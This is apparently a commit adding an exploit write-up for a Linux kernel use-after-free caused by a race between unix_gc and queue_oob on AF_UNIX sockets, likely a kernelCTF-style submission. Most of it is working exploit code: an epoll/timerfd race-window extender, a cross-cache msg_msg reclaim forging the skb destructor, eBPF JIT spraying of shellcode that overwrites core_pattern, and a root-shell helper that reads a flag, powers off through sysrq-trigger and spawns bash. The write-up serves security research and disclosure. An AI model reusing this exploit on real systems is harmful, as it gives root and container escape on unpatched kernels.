|
| 1 | +# Vulnerability |
| 2 | +unix_gc() tries to garbage-collect inflight sockets; if a socket has an MSG_OOB skb stored in unix_sk(sk)->oob_skb, GC drops that reference locklessly. |
| 3 | +This causes a race condition between unix_gc [1] and a peer unix socket calling queue_oob [2]. |
| 4 | + |
| 5 | +* unix_gc |
| 6 | +```c |
| 7 | + skb_queue_head_init(&hitlist); |
| 8 | + list_for_each_entry(u, &gc_candidates, link) { |
| 9 | + scan_children(&u->sk, inc_inflight, &hitlist); |
| 10 | + |
| 11 | +#if IS_ENABLED(CONFIG_AF_UNIX_OOB) |
| 12 | + if (u->oob_skb) { |
| 13 | + kfree_skb(u->oob_skb); //[1] |
| 14 | + u->oob_skb = NULL; |
| 15 | + } |
| 16 | +#endif |
| 17 | + } |
| 18 | + |
| 19 | +``` |
| 20 | +
|
| 21 | +* queue_oob |
| 22 | +```c |
| 23 | + if (ousk->oob_skb) |
| 24 | + consume_skb(ousk->oob_skb); //[2] |
| 25 | +
|
| 26 | + WRITE_ONCE(ousk->oob_skb, skb); |
| 27 | +``` |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +# Exploit Tech Detail |
| 32 | +The exploit consists of the following steps: |
| 33 | +* Prepare a timerfd to extend the race window |
| 34 | +* Prepare a refcount cycle to make unix_gc free the victim unix_socket |
| 35 | +* Race unix_gc against queue_oob |
| 36 | +* Reclaim the SKB with msg_msg to control the destructor |
| 37 | +* Call kfree_skb to gain RIP control |
| 38 | +* Achieve container escape |
| 39 | + |
| 40 | +## Prepare timerfd to extend race window |
| 41 | +We adopt the technique from Jann Horn's blog post `Racing against the clock -- hitting a tiny kernel race window` to extend the race window. |
| 42 | +To make the race window larger on kernels without CONFIG_PREEMPT: |
| 43 | +* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context) |
| 44 | +* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll |
| 45 | + |
| 46 | +The function `do_epoll_enqueue` in our exploit code does exactly this: |
| 47 | +```C |
| 48 | +void do_epoll_enqueue(int fd) |
| 49 | +{ |
| 50 | + int cfd[2]; |
| 51 | + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); |
| 52 | + for (int k = 0; k < 0x4; k++) |
| 53 | + { |
| 54 | + if (fork() == 0) |
| 55 | + { |
| 56 | + for (int i = 0; i < 0x100; i++) |
| 57 | + { |
| 58 | + timefds[i] = SYSCHK(dup(fd)); |
| 59 | + } |
| 60 | + for (int i = 0; i < 0xc0; i++) |
| 61 | + { |
| 62 | + epfds[i] = SYSCHK(epoll_create(0x1)); |
| 63 | + } |
| 64 | + for (int i = 0; i < 0xc0; i++) |
| 65 | + { |
| 66 | + for (int j = 0; j < 0x100; j++) |
| 67 | + { |
| 68 | + // queue as many as possible async waiters at timerfd waitqueue |
| 69 | + epoll_ctl_add(epfds[i], timefds[j], 0); |
| 70 | + } |
| 71 | + } |
| 72 | + write(cfd[1], buf, 1); |
| 73 | + raise(SIGSTOP); // stop here for nothing and just keep epoll alive |
| 74 | + } |
| 75 | + // sync to make sure it has queue what we need |
| 76 | + read(cfd[0], buf, 1); |
| 77 | + } |
| 78 | + close(cfd[0]); |
| 79 | + close(cfd[1]); |
| 80 | +} |
| 81 | +``` |
| 82 | +
|
| 83 | +## Race between unix_gc and queue_oob |
| 84 | +
|
| 85 | +The sk_buff refcount field is named `users`. An sk_buff is freed when kfree_skb is called while users == 1. |
| 86 | +A unix socket's oob_skb has a users count of two: one reference is held by unix_sock->oob_skb and the other by sock->sk_receive_queue. |
| 87 | +We use two threads to race unix_gc against queue_oob with the following interleaving. |
| 88 | +
|
| 89 | +Thread A | Thread B |
| 90 | +----------------------------|------------------------------ |
| 91 | +queue_oob() // users == 2 <br> consume_skb() // users == 2 -> 1 | unix_gc() |
| 92 | +<br> | if (u->oob_skb) // users == 1 <br> kfree_skb(u->oob_skb) // free skb |
| 93 | +WRITE_ONCE(ousk->oob_skb, skb) | |
| 94 | +<br> | unix_release_sock() <br> skb = skb_dequeue(&sk->sk_receive_queue) <br> kfree_skb(skb); // skb UAF |
| 95 | +
|
| 96 | +## Reclaim SKB with msg_msg to control destructor |
| 97 | +
|
| 98 | +sk_buff is allocated from the `skbuff_head_cache` cache, with an object size of `0xe0`: |
| 99 | +``` |
| 100 | +gef➤ p sizeof(struct sk_buff) |
| 101 | +$1 = 0xe0 |
| 102 | +``` |
| 103 | +Using a cross-cache technique, we can reclaim the victim skb as a msg_msg, which lives in the `kmalloc-cg-256` cache, as in the following example code. |
| 104 | +
|
| 105 | +* Allocate many skbs before and after the victim |
| 106 | +```c |
| 107 | + // Allocate some sk_buff before oob_skb |
| 108 | + for (int i = 0; i < 0x200; i++) |
| 109 | + SYSCHK(send(datafd[1], buf, 1, 0)); |
| 110 | +
|
| 111 | + SYSCHK(send(victim_fd[1], buf, 1, MSG_OOB)); |
| 112 | +
|
| 113 | + // Allocate some sk_buff after oob_skb |
| 114 | + for (int i = 0; i < 0x200; i++) |
| 115 | + SYSCHK(send(datafd[0], buf, 1, 0)); |
| 116 | +
|
| 117 | +``` |
| 118 | + |
| 119 | +* Free them all and reclaim as msg_msg |
| 120 | +```c |
| 121 | + // free all skbs |
| 122 | + for (int i = 0; i < 0x200; i++) |
| 123 | + SYSCHK(recv(datafd[0], buf, 1, 0)); |
| 124 | + |
| 125 | + // free all skbs |
| 126 | + for (int i = 0; i < 0x200; i++) |
| 127 | + SYSCHK(recv(datafd[1], buf, 1, 0)); |
| 128 | + |
| 129 | + // cross-cache to reclaim oob_skb as msg_msg |
| 130 | + for (int i = 0; i < 0x1000; i++) |
| 131 | + SYSCHK(msgsnd(msqid[i], &msg, 0x100 - 0x30, 0)); |
| 132 | +``` |
| 133 | +
|
| 134 | +* Forge the skb so that users equals one and destructor holds the address we want to jump to |
| 135 | +
|
| 136 | +```c |
| 137 | + char *skb = (void *)&msg.mtext[-0x30]; |
| 138 | +
|
| 139 | + // struct sk_buff { |
| 140 | + // void (*destructor)(struct sk_buff *); /* 96 8 */ |
| 141 | + // refcount_t users; /* 220 4 */ |
| 142 | +#define OFFSET_SKB_DESTRUCTOR 96 |
| 143 | +#define OFFSET_SKB_USERS 220 |
| 144 | + *(size_t *)(skb + OFFSET_SKB_DESTRUCTOR) = 0xffffffffcc000000 - 0x800; |
| 145 | + *(unsigned *)(skb + OFFSET_SKB_USERS) = 1; |
| 146 | +``` |
| 147 | + |
| 148 | +## RIP Control |
| 149 | +We set `skb->destructor` to a guessed eBPF JIT address. |
| 150 | + |
| 151 | +```c |
| 152 | +void skb_release_head_state(struct sk_buff *skb) |
| 153 | +{ |
| 154 | + skb_dst_drop(skb); |
| 155 | + if (skb->destructor) { |
| 156 | + DEBUG_NET_WARN_ON_ONCE(in_hardirq()); |
| 157 | + skb->destructor(skb); |
| 158 | + } |
| 159 | +``` |
| 160 | +
|
| 161 | +
|
| 162 | +## Achieve container escape |
| 163 | +### Spray eBPF programs |
| 164 | +Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode. |
| 165 | +
|
| 166 | +The Linux kernel provides the socket option `SO_ATTACH_FILTER`, which lets a user attach a classic BPF program to a socket for use as a filter of incoming packets. |
| 167 | +
|
| 168 | +By creating lots of sockets and attaching a classic BPF program to each of them, we can spray a lot of eBPF programs in the kernel. |
| 169 | +```cpp |
| 170 | + struct sock_fprog prog = { |
| 171 | + .len = TSIZE, |
| 172 | + .filter = filter, |
| 173 | + }; |
| 174 | + for(int i=0;i<NUM;i++){ |
| 175 | + int fd[2]; |
| 176 | + SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd)); |
| 177 | + SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog))); |
| 178 | + } |
| 179 | +``` |
| 180 | + |
| 181 | +As for the shellcode in our eBPF program, our goal is to overwrite `/proc/sys/kernel/core_pattern` so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal: |
| 182 | +* Use the `rdmsr` instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( `0xc0000082` ), we'll be able to obtain the address of `entry_SYSCALL_64`. |
| 183 | +* Calculate the address of `core_pattern` and `_copy_from_user`. |
| 184 | +* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a buffer in user space that stores the content we want to overwrite in `core_pattern`. |
| 185 | + |
| 186 | +We construct our eBPF program with the following form: |
| 187 | + |
| 188 | +```cpp |
| 189 | +struct sock_filter table[] = { |
| 190 | + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, |
| 191 | + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, |
| 192 | + ..................... |
| 193 | +}; |
| 194 | +``` |
| 195 | +
|
| 196 | +The above example will be compiled into the following instructions after JIT: |
| 197 | +
|
| 198 | +``` |
| 199 | +b8 90 90 90 b3 mov eax, 0xb3909090 |
| 200 | +b8 90 90 90 b3 mov eax, 0xb3909090 |
| 201 | +``` |
| 202 | +
|
| 203 | +If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become: |
| 204 | +
|
| 205 | +``` |
| 206 | +90 nop |
| 207 | +b3 b8 mov bl, 0xb8 |
| 208 | +90 nop |
| 209 | +90 nop |
| 210 | +90 nop |
| 211 | +b3 b8 mov bl, 0xb8 |
| 212 | +.... |
| 213 | +``` |
| 214 | +
|
| 215 | +We can see that by using an extra byte `0xb3`, we can skip the useless byte `0xb8` and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction. |
| 216 | +
|
| 217 | +### Post RIP |
| 218 | +
|
| 219 | +Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted overwrites core_pattern with `|/proc/%P/fd/666 %P`: |
| 220 | +
|
| 221 | +We then use a memfd to place an executable payload at fd 666. |
| 222 | +```C |
| 223 | +int check_core() |
| 224 | +{ |
| 225 | + // Check if /proc/sys/kernel/core_pattern has been overwritten |
| 226 | + char buf[0x100] = {}; |
| 227 | + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); |
| 228 | + read(core, buf, sizeof(buf)); |
| 229 | + close(core); |
| 230 | + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; |
| 231 | +} |
| 232 | +void crash(char *cmd) |
| 233 | +{ |
| 234 | + int memfd = memfd_create("", 0); |
| 235 | + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); |
| 236 | + dup2(memfd, 666); |
| 237 | + close(memfd); |
| 238 | + while (check_core() == 0) |
| 239 | + sleep(1); |
| 240 | + puts("Root shell !!"); |
| 241 | + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ |
| 242 | + *(size_t *)0 = 0; |
| 243 | +} |
| 244 | +``` |
| 245 | + |
| 246 | +Later, when the coredump happens, the kernel executes our executable file as root in the root namespace: |
| 247 | +```C |
| 248 | +*(size_t*)0=0; //trigger coredump |
| 249 | +``` |
| 250 | + |
| 251 | +Spawn a shell when the coredump happens. The code looks like this: |
| 252 | +```c++ |
| 253 | +int main(int argc, char **argv) |
| 254 | +{ |
| 255 | + if (argc > 1) |
| 256 | + { |
| 257 | + // #define SYS_pidfd_getfd 438 |
| 258 | + int pid = strtoull(argv[1], 0, 10); |
| 259 | + int pfd = syscall(SYS_pidfd_open, pid, 0); |
| 260 | + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); |
| 261 | + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); |
| 262 | + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); |
| 263 | + dup2(stdinfd, 0); |
| 264 | + dup2(stdoutfd, 1); |
| 265 | + dup2(stderrfd, 2); |
| 266 | + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ |
| 267 | + system("cat /flag;echo o>/proc/sysrq-trigger"); |
| 268 | + execlp("bash", "bash", NULL); |
| 269 | + } |
| 270 | +``` |
0 commit comments